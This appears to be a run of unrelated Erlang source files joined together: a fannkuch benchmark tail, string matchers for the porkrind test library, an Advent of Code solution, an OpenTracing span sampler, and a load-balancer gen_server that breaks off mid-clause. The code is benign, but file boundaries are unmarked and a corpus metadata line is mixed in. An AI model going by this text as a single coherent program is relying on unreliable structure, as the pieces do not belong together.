                join(N, 0, 0)
        end,
    io:format("~p~nPfannkuchen(~p) = ~p~n", [Checksum, N, MaxFlips]),
    {MaxFlips, Checksum}.

%% @doc Spawn one worker per chunk of the permutation space; rotating the
%% list by one element per iteration selects each worker's start point.
%% NOTE(review): plain spawn/1 leaves workers unlinked, so a worker crash
%% would leave join/3 waiting forever.
divide(N, N, _L, _C) -> ok;
divide(N, MaxN, [H|T] = List, Chunk) ->
    Self = self(),
    Fun = fun() ->
        work(N, List, N * Chunk, (N + 1) * Chunk, MaxN, 0, 0, Self)
    end,
    spawn(Fun),
    divide(N + 1, MaxN, T ++ [H], Chunk).

%% @doc Collect {Flips, Sum} messages from the N workers, keeping the
%% maximum flip count and summing the checksum contributions.
join(0, MaxFlips, Checksum) -> {MaxFlips, Checksum};
join(N, MaxFlips, Checksum) ->
    receive
        {Flips, Sum} -> join(N - 1, max(MaxFlips, Flips), Checksum + Sum)
    end.
%% @doc Worker loop over permutation indices [Index, MaxIndex): track the
%% maximum flip count and the running checksum, then send the pair to
%% Target. R is the highest rotation level consumed by the previous step;
%% reset/1 restores the process-dictionary counters below it before the
%% next permutation is generated.
work(_P, _L, Index, Index, _R, MaxFlips, Checksum, Target) ->
    Target ! {MaxFlips, Checksum};
work(Proc, List, Index, MaxIndex, R, MaxFlips, Checksum, Target) ->
    reset(R),
    {Flips, Sum} = flip_sum(Index, List),
    NewFlips = max(Flips, MaxFlips),
    NewSum = Checksum + Sum,
    {NewList, NewR} = next(Proc, List, 1),
    work(Proc, NewList, Index + 1, MaxIndex, NewR, NewFlips, NewSum, Target).
%% @doc Advance to the next permutation. Rotates the first R+1 elements
%% left by one; the process-dictionary counter for level R counts the
%% rotations remaining at that level. put/2 returns the counter's
%% PREVIOUS value, so seeing 1 means this level just became exhausted and
%% the next level up must be rotated as well.
next(Proc, List, R) ->
    NewList = next_aux(R, List),
    case put(R, get(R) - 1) of
        1 -> next(Proc, NewList, R + 1);
        _Other -> {NewList, R}
    end.

%% @doc Rotate the first R+1 elements of the list one step to the left.
%% The first three cases are hand-unrolled for speed; the general case
%% falls back to lists:split/2.
next_aux(1, [E1, E2|T]) -> [E2, E1|T];
next_aux(2, [E1, E2, E3|T]) -> [E2, E3, E1|T];
next_aux(3, [E1, E2, E3, E4|T]) -> [E2, E3, E4, E1|T];
next_aux(R, [H|T]) ->
    {Front, Back} = lists:split(R, T),
    Front ++ [H] ++ Back.
%% @doc Count the flips for this permutation and derive its checksum
%% contribution: +Flips for even permutation indices, -Flips for odd ones.
flip_sum(Index, List) ->
    Flips = flip(List, 0),
    case Index band 1 of
        0 -> {Flips, Flips};
        1 -> {Flips, -Flips}
    end.
%% @doc Count how many prefix reversals it takes until 1 reaches the head
%% of the list. Heads 2..12 are hand-unrolled (the benchmark is run with
%% N =< 12); larger heads fall back to lists:split + lists:reverse. The
%% unrolled clauses are deliberate performance tuning — keep as written.
flip([1|_T], N) ->
    N;
flip([2, E1|T], N) ->
    flip([E1, 2|T], N + 1);
flip([3, E1, E2|T], N) ->
    flip([E2, E1, 3|T], N + 1);
flip([4, E1, E2, E3|T], N) ->
    flip([E3, E2, E1, 4|T], N + 1);
flip([5, E1, E2, E3, E4|T], N) ->
    flip([E4, E3, E2, E1, 5|T], N + 1);
flip([6, E1, E2, E3, E4, E5|T], N) ->
    flip([E5, E4, E3, E2, E1, 6|T], N + 1);
flip([7, E1, E2, E3, E4, E5, E6|T], N) ->
    flip([E6, E5, E4, E3, E2, E1, 7|T], N + 1);
flip([8, E1, E2, E3, E4, E5, E6, E7|T], N) ->
    flip([E7, E6, E5, E4, E3, E2, E1, 8|T], N + 1);
flip([9, E1, E2, E3, E4, E5, E6, E7, E8|T], N) ->
    flip([E8, E7, E6, E5, E4, E3, E2, E1, 9|T], N + 1);
flip([10, E1, E2, E3, E4, E5, E6, E7, E8, E9|T], N) ->
    flip([E9, E8, E7, E6, E5, E4, E3, E2, E1, 10|T], N + 1);
flip([11, E1, E2, E3, E4, E5, E6, E7, E8, E9, E10|T], N) ->
    flip([E10, E9, E8, E7, E6, E5, E4, E3, E2, E1, 11|T], N + 1);
flip([12, E1, E2, E3, E4, E5, E6, E7, E8, E9, E10, E11|T], N) ->
    flip([E11, E10, E9, E8, E7, E6, E5, E4, E3, E2, E1, 12|T], N + 1);
flip([H|_T] = List, N) ->
    %% General case: reverse the first H elements of the list.
    {First, Last} = lists:split(H, List),
    flip(lists:reverse(First) ++ Last, N + 1).
%% @doc Re-initialise the rotation counters 1..Level-1 in the process
%% dictionary: counter K is set to K + 1 (level K allows K + 1 rotations).
reset(1) ->
    ok;
reset(Level) ->
    put(Level - 1, Level),
    reset(Level - 1).
%% @doc Factorial of a non-negative integer. A 0 base case and an N > 1
%% guard were added: previously fact(0) recursed forever into negative
%% numbers; now fact(0) =:= 1 and negative input fails fast with a
%% function_clause error.
fact(0) -> 1;
fact(1) -> 1;
fact(N) when N > 1 -> N * fact(N - 1).
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind_strings).
-include("porkrind_internal.hrl").
% For string matchers, the args determine if the expect value
% should be a binary or list. I.e., if the arg is a binary
% then the value being matched must also be a binary.
-export([
has_length/1,
contains_string/1,
starts_with/1,
ends_with/1,
equal_to_string/1,
equal_ignoring_case/1,
equal_ignoring_whitespace/1,
matches_re/1,
matches_re/2,
string_contains_in_order/1
]).
%% @doc Matcher asserting that a string (charlist/iodata/binary) is
%% exactly `Length' bytes long after coercion to a binary. Note the
%% length is measured in bytes of the encoded form, not in characters.
has_length(Length) when is_integer(Length), Length >= 0 ->
    #'porkrind.matcher'{
        name = has_length,
        args = [Length],
        match = fun(Value0) ->
            String = to_binary(Value0),
            %% byte_size/1 rather than the generic size/1: it states the
            %% intent (binary length) and rejects non-binaries early.
            case byte_size(String) of
                Length ->
                    ok;
                Mismatch ->
                    ?PR_FAIL({mismatch, Value0, Mismatch})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({mismatch, Value, Mismatch}) ->
                Args = [Value, Mismatch, Length],
                io_lib:format("~p has length ~b, not ~b", Args)
        end
    }.
%% @doc Matcher: the (binary-coerced) value contains `Pattern0' as a
%% contiguous substring.
contains_string(Pattern0) ->
    Pattern = pattern_to_binary(Pattern0),
    #'porkrind.matcher'{
        name = contains_string,
        args = [Pattern0],
        match = fun(Value0) ->
            Value = to_binary(Value0),
            case binary:match(Value, Pattern) of
                {_Pos, _Len} ->
                    ok;
                nomatch ->
                    ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                io_lib:format("~p does not contain ~p", [Value, Pattern0])
        end
    }.

%% @doc Matcher: the value starts with `Pattern0'. A common prefix as
%% long as the whole pattern means the pattern is a prefix.
starts_with(Pattern0) ->
    Pattern = pattern_to_binary(Pattern0),
    #'porkrind.matcher'{
        name = starts_with,
        args = [Pattern0],
        match = fun(Value0) ->
            Value = to_binary(Value0),
            case binary:longest_common_prefix([Value, Pattern]) of
                Length when Length == size(Pattern) ->
                    ok;
                _ ->
                    ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                io_lib:format("~p does not start with ~p", [Value, Pattern0])
        end
    }.

%% @doc Matcher: the value ends with `Pattern0'. A common suffix as long
%% as the whole pattern means the pattern is a suffix.
ends_with(Pattern0) ->
    Pattern = pattern_to_binary(Pattern0),
    #'porkrind.matcher'{
        name = ends_with,
        args = [Pattern0],
        match = fun(Value0) ->
            Value = to_binary(Value0),
            case binary:longest_common_suffix([Value, Pattern]) of
                Length when Length == size(Pattern) ->
                    ok;
                _ ->
                    ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                io_lib:format("~p does not end with ~p", [Value, Pattern0])
        end
    }.
%% @doc Matcher: exact equality after both sides are coerced to binaries
%% (so "abc" and <<"abc">> compare equal). The caller-supplied expected
%% value is converted with pattern_to_binary/1 — consistent with every
%% other matcher here — so a non-string argument raises {badarg, _} at
%% construction time instead of leaking the internal match-failure throw.
equal_to_string(String0) ->
    String = pattern_to_binary(String0),
    #'porkrind.matcher'{
        name = equal_to_string,
        args = [String0],
        match = fun(Value0) ->
            Value = to_binary(Value0),
            if Value == String -> ok; true ->
                ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                io_lib:format("~p does not equal ~p", [Value, String0])
        end
    }.
%% @doc Matcher: case-insensitive equality with `Pattern0'. Both sides
%% are ASCII-lowercased before comparison. Failures now carry and report
%% the ORIGINAL (uncased) value and pattern, consistent with the other
%% matchers in this module, instead of the lowered intermediates.
equal_ignoring_case(Pattern0) ->
    Pattern = to_lower(pattern_to_binary(Pattern0)),
    #'porkrind.matcher'{
        name = equal_ignoring_case,
        args = [Pattern0],
        match = fun(Value0) ->
            Value = to_lower(to_binary(Value0)),
            case Value == Pattern of
                true ->
                    ok;
                false ->
                    ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                io_lib:format("~p does not equal ~p", [Value, Pattern0])
        end
    }.
%% @doc Matcher: equality after stripping all whitespace (space, tab, CR,
%% LF) from both sides. Failures now carry and report the ORIGINAL value
%% and pattern, consistent with the other matchers in this module,
%% instead of the whitespace-stripped intermediates.
equal_ignoring_whitespace(Pattern0) ->
    Pattern = strip_whitespace(pattern_to_binary(Pattern0)),
    #'porkrind.matcher'{
        name = equal_ignoring_whitespace,
        args = [Pattern0],
        match = fun(Value0) ->
            Value = strip_whitespace(to_binary(Value0)),
            case Value == Pattern of
                true ->
                    ok;
                false ->
                    ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                io_lib:format("~p does not equal ~p", [Value, Pattern0])
        end
    }.
%% @doc Matcher: value matches the regular expression, no options.
matches_re(Pattern) ->
    matches_re(Pattern, []).

%% @doc Matcher: value matches the regular expression under `Opts'.
%% Options are split into the subsets valid for re:compile/2 and
%% re:run/3; anything unknown is silently dropped by the filters below.
matches_re(Pattern0, Opts) when is_list(Opts) ->
    % Compile ahead of time so that errors in the regexp
    % are noted before the test runs.
    Pattern = pattern_to_binary(Pattern0),
    CompileOpts = compile_opts(Opts),
    RunOpts = run_opts(Opts),
    {ok, MP} = re:compile(Pattern, CompileOpts),
    #'porkrind.matcher'{
        name = matches_re,
        args = [Pattern0, Opts],
        match = fun(Value0) ->
            Value = to_binary(Value0),
            %% re:run/3 returns `match' (no capture) or {match, _},
            %% depending on the capture option; accept both.
            case re:run(Value, MP, RunOpts) of
                {match, _} ->
                    ok;
                match ->
                    ok;
                _ ->
                    ?PR_FAIL({nomatch, Value0})
            end
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value}) ->
                Args = [Value, Pattern, opts_to_string(Opts)],
                io_lib:format("~p does not match ~p~s", Args)
        end
    }.
%% @doc Matcher: the value contains each of `Patterns0' in order, without
%% overlap. The fold keeps a shrinking search window: after each hit the
%% window starts just past the matched bytes.
string_contains_in_order(Patterns0) when is_list(Patterns0) ->
    Patterns = lists:map(fun(P) ->
        pattern_to_binary(P)
    end, Patterns0),
    #'porkrind.matcher'{
        name = contains_in_order,
        args = [Patterns0],
        match = fun(Value0) ->
            Value = to_binary(Value0),
            %% {S, L} is the remaining search window: start offset and
            %% length within Value.
            lists:foldl(fun(P, {S, L}) ->
                case binary:match(Value, P, [{scope, {S, L}}]) of
                    {PS, PL} ->
                        {PS + PL, size(Value) - PS - PL};
                    nomatch ->
                        %% Report only the unsearched tail for context.
                        Tail = binary:part(Value, {S, L}),
                        ?PR_FAIL({nomatch, Tail, P})
                end
            end, {0, size(Value)}, Patterns)
        end,
        reason = fun
            ({bad_type, Value}) ->
                io_lib:format("~p is not a string", [Value]);
            ({nomatch, Value, Pattern}) ->
                io_lib:format("~p does not match ~p", [Value, Pattern])
        end
    }.
%% @doc Coerce a charlist/iodata/binary to a binary, signalling a
%% {bad_type, _} match failure when the input is not convertible.
to_binary(String) ->
    try
        iolist_to_binary(String)
    catch
        _:_ ->
            ?PR_FAIL({bad_type, String})
    end.
%% @doc Like to_binary/1, but for caller-supplied patterns: a conversion
%% failure is a programmer error, raised as error({badarg, String})
%% rather than the internal match-failure throw.
pattern_to_binary(String) ->
    try
        to_binary(String)
    catch _:_ ->
        erlang:error({badarg, String})
    end.
%% @doc ASCII-lowercase a binary; bytes outside A-Z pass through
%% unchanged (deliberately not Unicode-aware).
to_lower(Binary) ->
    to_lower(binary_to_list(Binary), []).

to_lower([], Acc) ->
    list_to_binary(lists:reverse(Acc));
to_lower([Upper | Rest], Acc) when Upper >= $A, Upper =< $Z ->
    to_lower(Rest, [Upper + ($a - $A) | Acc]);
to_lower([Other | Rest], Acc) ->
    to_lower(Rest, [Other | Acc]).
%% @doc Remove every space, tab, CR and LF byte from a binary.
strip_whitespace(Binary) ->
    strip_whitespace(binary_to_list(Binary), []).

strip_whitespace([], Acc) ->
    list_to_binary(lists:reverse(Acc));
strip_whitespace([C | Rest], Acc) ->
    case lists:member(C, " \t\r\n") of
        true -> strip_whitespace(Rest, Acc);
        false -> strip_whitespace(Rest, [C | Acc])
    end.
%% @doc Render regex options as a suffix for failure messages; an empty
%% option list renders as the empty string.
opts_to_string(Opts) ->
    case Opts of
        [] -> "";
        _ -> io_lib:format(" with options: ~p", [Opts])
    end.
%% @doc Keep only the options that re:compile/2 understands.
compile_opts(Opts) ->
    filter_opts(Opts, compile_opt_names()).

%% @doc Keep only the options that re:run/3 understands.
run_opts(Opts) ->
    filter_opts(Opts, run_opt_names()).

%% @doc Filter an option list down to the entries whose name (the bare
%% atom, or the first element of a 2- or 3-tuple) appears in Allowed.
%% Preserves the original order.
filter_opts(Opts, Allowed) ->
    [Opt || Opt <- Opts, lists:member(opt_name(Opt), Allowed)].

%% The name of an option: tuple options are keyed by their first element.
opt_name({Name, _}) -> Name;
opt_name({Name, _, _}) -> Name;
opt_name(Opt) -> Opt.

%% Option names accepted by re:compile/2.
compile_opt_names() ->
    [unicode, anchored, caseless, dollar_endonly, dotall, extended,
     firstline, multiline, no_auto_capture, dupnames, ungreedy, newline,
     bsr_anycrlf, bsr_unicode, no_start_optimize, ucp, never_utf].

%% Option names accepted by re:run/3.
run_opt_names() ->
    [anchored, capture, global, match_limit, match_limit_recursion,
     newline, notbol, notempty, notempty_atstart, noteol, offset,
     report_errors].
-module(day3).
-behaviour(aoc).
-include_lib("eunit/include/eunit.hrl").
-type bit() :: 0..1.
-type report() :: [[bit(), ...], ...].
-export([run/1]).
-spec run(argparse:part()) -> ok.
%% @doc aoc behaviour entry point: read the diagnostic report once, then
%% dispatch to the requested puzzle part (1 or 2).
run(Part) ->
    Report = read_report(),
    case Part of
        1 -> part1(Report);
        2 -> part2(Report)
    end.

-spec part1(report()) -> ok.
%% @doc Part 1: gamma rate is the most common bit per position; epsilon
%% rate is its bitwise complement. Prints both and their product.
part1(Report) ->
    GammaRate = most_common_bits(Report),
    EpsilonRate = [Bit bxor 1 || Bit <- GammaRate],
    GammaRateDecimal = bits_to_integer(GammaRate),
    EpsilonRateDecimal = bits_to_integer(EpsilonRate),
    io:format("Gamma rate bits: ~p~n", [GammaRate]),
    io:format("Gamma rate decimal: ~p~n", [GammaRateDecimal]),
    io:format("Epsilon rate bits: ~p~n", [EpsilonRate]),
    io:format("Epsilon rate decimal: ~p~n", [bits_to_integer(EpsilonRate)]),
    io:format("Product: ~p~n", [GammaRateDecimal * EpsilonRateDecimal]).

-spec part2(report()) -> ok.
%% @doc Part 2: oxygen-generator and CO2-scrubber ratings via iterative
%% bit-criteria filtering. Prints both and their product.
part2(Report) ->
    OxygenRating = rating_filter(oxygen, Report),
    OxygenRatingDecimal = bits_to_integer(OxygenRating),
    C02Rating = rating_filter(c02, Report),
    C02RatingDecimal = bits_to_integer(C02Rating),
    io:format("Oxygen generator rating: ~p~n", [OxygenRating]),
    io:format("Oxygen generator rating decimal: ~p~n", [OxygenRatingDecimal]),
    io:format("C02 generator rating: ~p~n", [C02Rating]),
    io:format("C02 generator rating decimal: ~p~n", [C02RatingDecimal]),
    io:format("Product: ~p~n", [OxygenRatingDecimal * C02RatingDecimal]).
-spec most_common_bits(report()) -> [bit()].
%% @doc The most common bit at each position across all report rows, as a
%% list ordered by position (an exact tie yields 1 via most_common_bit/1).
most_common_bits(Report) ->
    Positions = lists:seq(1, length(hd(Report))),
    [most_common_bit([lists:nth(Pos, Row) || Row <- Report]) || Pos <- Positions].
%% Exercises most_common_bits/1 against the puzzle's example report.
most_common_bits_test() ->
    ?assertEqual([1, 0, 1, 1, 0], most_common_bits(example_report())).
-spec rating_filter(oxygen | c02, report()) -> [bit()].
%% @doc Repeatedly filter the report by bit criteria, one position at a
%% time: oxygen keeps rows matching the most common bit, c02 rows
%% matching the least common one. A throw short-circuits the fold once a
%% single candidate remains. Replaced the old-style `catch Expr' with
%% try/catch throw:_ — the old form also captured runtime errors as
%% {'EXIT', Reason} tuples (then crashed confusingly in lists:flatten);
%% real errors now propagate with their stacktrace.
rating_filter(Type, Report) ->
    NbrPositions = length(hd(Report)),
    Rating =
        try
            lists:foldl(
                fun
                    (_Position, [ValidNumber | []]) ->
                        %% Exactly one candidate left: short-circuit out.
                        throw(ValidNumber);
                    (Position, ValidNumbers) ->
                        BitsInPosition = [lists:nth(Position, X) || X <- ValidNumbers],
                        MostCommonBit = most_common_bit(BitsInPosition),
                        MatchingBit =
                            case Type of
                                oxygen -> MostCommonBit;
                                c02 -> 1 bxor MostCommonBit
                            end,
                        lists:filtermap(
                            fun
                                ({Bit, Number}) when Bit == MatchingBit ->
                                    {true, Number};
                                ({_, _}) ->
                                    false
                            end,
                            lists:zip(BitsInPosition, ValidNumbers)
                        )
                end,
                Report,
                lists:seq(1, NbrPositions)
            )
        catch
            throw:Single -> Single
        end,
    %% Normalises both outcomes: a thrown [bit()] stays as-is, a fold
    %% result of [[bit()]] collapses to its single row.
    lists:flatten(Rating).
%% rating_filter/2 should reduce the example report to the known
%% oxygen-generator rating bits...
oxygen_generator_rating_filter_test() ->
    ?assertEqual(
        [1, 0, 1, 1, 1],
        rating_filter(oxygen, example_report())
    ).

%% ...and to the known CO2-scrubber rating bits.
co2_scrubber_rator_rating_filter_test() ->
    ?assertEqual(
        [0, 1, 0, 1, 0],
        rating_filter(c02, example_report())
    ).
-spec most_common_bit([bit()]) -> bit().
%% @doc The bit occurring most often in the list; an exact tie yields 1
%% (round/1 rounds 0.5 away from zero).
most_common_bit(Bits) ->
    round(average(Bits)).

-spec average([bit()]) -> float().
%% @doc Arithmetic mean of a non-empty list of bits.
average(Bits) ->
    Total = lists:sum(Bits),
    Total / length(Bits).
%% Sanity check for average/1.
average_test() -> ?assertEqual(0.5, average([0, 1])).
-spec bits_to_integer([bit()]) -> integer().
%% @doc Interpret a list of bits (most significant first) as an integer.
%% Rewritten with pure integer arithmetic (Acc * 2 + Bit): the previous
%% math:pow/round float approach loses precision once the bit string
%% exceeds the 53-bit double mantissa, and the fold is simpler besides.
bits_to_integer(Bits) ->
    lists:foldl(fun(Bit, Acc) -> Acc * 2 + Bit end, 0, Bits).
%% Sanity check for bits_to_integer/1 (0011 -> 3).
bits_to_integer_test() -> ?assertEqual(3, bits_to_integer([0, 0, 1, 1])).
-spec example_report() -> report().
%% @doc The sample diagnostic report from the puzzle description, used by
%% the EUnit tests above.
example_report() ->
    [
        [0, 0, 1, 0, 0],
        [1, 1, 1, 1, 0],
        [1, 0, 1, 1, 0],
        [1, 0, 1, 1, 1],
        [1, 0, 1, 0, 1],
        [0, 1, 1, 1, 1],
        [0, 0, 1, 1, 1],
        [1, 1, 1, 0, 0],
        [1, 0, 0, 0, 0],
        [1, 1, 0, 0, 1],
        [0, 0, 0, 1, 0],
        [0, 1, 0, 1, 0]
    ].
-spec read_report() -> report().
%% @doc Read the puzzle input from "input/day3" and turn each line into a
%% list of bits. Crashes with badmatch if the file cannot be read.
read_report() ->
    {ok, Binary} = file:read_file("input/day3"),
    Rows = string:lexemes(binary_to_list(Binary), "\n"),
    lists:map(fun string_to_report/1, Rows).
-spec string_to_report(string()) -> [bit()].
%% @doc Convert a string of ASCII digit characters to their bit values.
string_to_report(Digits) ->
    lists:map(fun(Char) -> Char - $0 end, Digits).
%% @copyright 2017 <NAME> <<EMAIL>>
%%
%% @doc Span Sampler.
%%
%% Note that this component has not been described in the
%% <a href="https://github.com/opentracing/specification/blob/1.1/specification.md">OpenTracing Specification</a>.
%%
%% === Callbacks ===
%%
%% This module requires following callback:
%%
%% ```
%% %% @doc Determines to sample the next span which has the given name and tags.
%% -callback is_sampled(state(), passage:operation_name(), passage:tags()) -> boolean().
%% '''
-module(passage_sampler).
%%------------------------------------------------------------------------------
%% Exported API
%%------------------------------------------------------------------------------
-export([new/2]).
-export([is_sampler/1]).
-export([get_module/1]).
-export([get_state/1]).
-export([is_sampled/3]).
-export_type([sampler/0]).
%% Fixed attribute typo: was `-export_tyep', which the compiler accepts
%% as an unknown user attribute, silently failing to export state/0.
-export_type([state/0]).
%%------------------------------------------------------------------------------
%% Callback API
%%------------------------------------------------------------------------------
-callback is_sampled(state(), passage:operation_name(), passage:tags()) -> boolean().
%%------------------------------------------------------------------------------
%% Macros and Records
%%------------------------------------------------------------------------------
-define(SAMPLER, ?MODULE).
-record(?SAMPLER,
{
module :: module(),
state :: state()
}).
%%------------------------------------------------------------------------------
%% Exported Types
%%------------------------------------------------------------------------------
-opaque sampler() :: #?SAMPLER{}.
%% Sampler.
-type state() :: term().
%% Implementation-dependent state.
%%------------------------------------------------------------------------------
%% Exported Functions
%%------------------------------------------------------------------------------
%% @doc Makes a new sampler.
%%
%% Note that `Module' must be an implementation module of the
%% `passage_sampler' behaviour (i.e. it exports is_sampled/3).
-spec new(module(), state()) -> sampler().
new(Module, State) ->
    #?SAMPLER{module = Module, state = State}.

%% @doc Returns `true' if `X' is a sampler, otherwise `false'.
-spec is_sampler(sampler() | term()) -> boolean().
is_sampler(X) ->
    is_record(X, ?SAMPLER).

%% @doc Returns the callback module of `Sampler'.
-spec get_module(sampler()) -> module().
get_module(Sampler) ->
    Sampler#?SAMPLER.module.

%% @doc Returns the implementation-dependent state of `Sampler'.
-spec get_state(sampler()) -> state().
get_state(Sampler) ->
    Sampler#?SAMPLER.state.

%% @doc Determines whether to sample the next span with the given name
%% and tags, by delegating to the callback module's is_sampled/3.
-spec is_sampled(sampler(), passage:operation_name(), passage:tags()) -> boolean().
is_sampled(#?SAMPLER{module = Module, state = State}, Name, Tags) ->
    Module:is_sampled(State, Name, Tags). | src/passage_sampler.erl | 0.617859 | 0.439868 | passage_sampler.erl | starcoder
%% @doc
%% Probabilistic Load Balancer. Schedules function
%% execution on a node selected with randomised weighted
%% sampling. Used credit-based approach for implementing
%% backpressure: when a node did not provide credit, no
%% call/cast to that node is allowed.
%%
%% Capacity discovery: plb subscribes to module via local
%% broker, and issues "buy" order when needed.
%%
%% @end
-module(lambda_plb).
-author("<EMAIL>").
%% API
-export([
start_link/3,
cast/4,
call/4,
capacity/1,
meta/1,
%% internal API for broker
complete_order/2
]).
-behaviour(gen_server).
%% gen_server callbacks
-export([
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2
]).
%% Internal exports for testing
-export([
take/2
]).
%% Options for this plb (module).
-type options() :: #{
%% capacity to request from all servers combined
capacity := non_neg_integer(),
%% version or version range to accept
vsn => integer(),
%% local broker process (lambda_broker by default)
broker => lambda:dst(),
%% disable automatic meta query/compilation
compile => false
}.
-export_type([options/0]).
-include_lib("kernel/include/logger.hrl").
%%--------------------------------------------------------------------
%% @doc
%% Starts the server and links it to calling process.
-spec start_link(lambda:dst(), module(), options()) -> {ok, pid()} | {error, {already_started, pid()}}.
start_link(Broker, Module, Options) when is_atom(Module) ->
    %% The balancer registers locally under the name of the module it
    %% balances, so cast/call can address it by module name.
    gen_server:start_link({local, Module}, ?MODULE, {Broker, Module, Options}, []).

%%--------------------------------------------------------------------
%% API

%% @doc Starts a request on a node selected with weighted random
%% sampling. May block if no capacity left.
%% Returns {error, suspend} if 'nosuspend' requested, but no capacity left.
-spec cast(module(), atom(), [term()], nosuspend | timeout()) -> ok | {error, suspend}.
cast(M, F, A, Timeout) ->
    case gen_server:call(M, token, infinity) of
        {suspend, _Queue} when Timeout =:= nosuspend ->
            {error, suspend};
        {suspend, Queue} ->
            %% Park on the queue process until capacity appears, retry.
            gen_server:call(Queue, wait, Timeout),
            cast(M, F, A, Timeout);
        To ->
            %% To is a remote channel pid; fire-and-forget execution.
            erpc:cast(node(To), lambda_channel, handle, [To, M, F, A])
    end.

%% @doc Call executed on a node which is selected with weighted random
%% sampling. Returns {error, suspend} if 'nosuspend' requested, but no capacity left.
-spec call(module(), atom(), [term()], nosuspend | timeout()) -> term() | {error, suspend}.
call(M, F, A, Timeout) ->
    case gen_server:call(M, token, infinity) of
        {suspend, _Queue} when Timeout =:= nosuspend ->
            {error, suspend};
        {suspend, Queue} ->
            gen_server:call(Queue, wait, Timeout),
            call(M, F, A, Timeout);
        To ->
            Rid = erpc:send_request(node(To), lambda_channel, handle, [To, M, F, A]),
            case erpc:wait_response(Rid, infinity) of
                {response, Res} ->
                    Res;
                no_response ->
                    exit(timeout)
            end
    end.

%% @doc Returns current capacity.
-spec capacity(module()) -> non_neg_integer().
capacity(Module) ->
    gen_server:call(Module, capacity).

%% @doc Waits until PLB discovers the module, compiles proxy module and
%% returns meta information.
-spec meta(atom() | pid()) -> module().
meta(Srv) ->
    gen_server:call(Srv, meta, infinity).

%% @doc Invoked by a broker, when order has been completed.
%% With an empty option list erlang:send/3 behaves like `Srv ! Msg'
%% and returns `ok'.
-spec complete_order(lambda:dst(), [{pid(), Quantity :: pos_integer(), Meta :: lambda:meta()}]) -> ok.
complete_order(Srv, Servers) ->
    erlang:send(Srv, {complete_order, Servers}, []).
%%--------------------------------------------------------------------
%% Weighted random sampling: each server process has a weight.
%% Fast selection implemented with Ryabko array, also known as Fenwick
%% trees or bit-indexed tree.
%% Since Erlang does not have a notion of mutable array, and tuples
%% are very slow to modify, process dictionary is used for Ryabko
%% array.
%% Array is zero-indexed for faster 'select' query. Example, in
%% process dictionary, for an array of [13, 9, 10, 5] is:
%% {0, 13}, {1, 22}, {2, 10}, {3, 37}
%%
%% Alternative implementation with faster insert/remove operation
%% can be done with augmented binary tree, analogous to gb_tree,
%% but with added left/right capacity.
%% gen_server state of the probabilistic load balancer. The Fenwick array
%% holding per-server weights lives in the process dictionary (see the
%% explanation above), not in this record.
-record(lambda_plb_state, {
    %% remember module name for event handler
    module :: module(),
    %% meta: meta-information about currently loaded module. When 'false',
    %%  meta is not relevant, and no automatic compilation happens,
    %%  when a list of {pid, ref} - list of processes waiting for PLB to
    %%  receive meta
    meta :: false | [{pid(), reference()}] | lambda:meta(),
    %% current capacity, needed for quick reject logic
    capacity = 0 :: non_neg_integer(),
    %% high/low capacity watermarks
    high :: pos_integer(),
    %% connected servers, maps pid to an index & expected capacity
    pid_to_index = #{} :: #{pid() => {Index :: non_neg_integer(), Capacity :: non_neg_integer()}},
    %% connected servers, maps index to pid
    %%  it could be faster to use process dictionary for
    %%  this as well, but to prove it, better performance
    %%  testing framework is needed
    index_to_pid = {undefined} :: tuple(),
    %% index_to_pid tuple size can be cached, proven that
    %%  it makes performance better
    %% size = 1 :: pos_integer(),
    %% list of free indices, for amortised O(1) insertion
    free = [0] :: [non_neg_integer()],
    %% queue: process that accepts 'wait' requests
    queue :: pid(),
    %% local broker, monitored for failover purposes
    broker :: lambda:dst()
}).

-type state() :: #lambda_plb_state{}.
%% gen_server init: seeds the Fenwick array, places a buy order with the
%% local broker and spawns the blocking queue helper process.
-spec init({lambda:dst(), Module :: atom(), Options :: options()}) -> {ok, state()}.
init({Broker, Module, #{capacity := HW} = Options}) ->
    %% initial array contains a single zero element with zero weight
    put(0, 0),
    %% monitor the broker (and reconnect if it restarts)
    erlang:monitor(process, Broker),
    ?LOG_DEBUG("requesting ~b ~s from ~p", [HW, Module, Broker], #{domain => [lambda]}),
    %% not planning to cancel the order
    OrderOpts = #{module => maps:with([vsn], Options)},
    _ = lambda_broker:buy(Broker, Module, HW, OrderOpts),
    {ok, #lambda_plb_state{module = Module,
        %% queue process: callers park here when capacity is exhausted
        queue = proc_lib:spawn_link(fun queue/0),
        %% meta starts as a (possibly empty) list of waiters; replaced by
        %% the module meta map once the first order completes
        meta = maps:get(compile, Options, []),
        broker = Broker,
        high = HW}}.
%% token request with zero capacity: caller must wait on the queue process.
handle_call(token, _From, #lambda_plb_state{capacity = 0, queue = Queue} = State) ->
    % ?LOG_DEBUG("~p: no capacity: sending to queue ~p", [_From, Queue], #{domain => [lambda]}),
    {reply, {suspend, Queue}, State};
%% token request with capacity left: weighted random pick of a server index
%% via the Fenwick array (take/2 also decrements the picked weight by one).
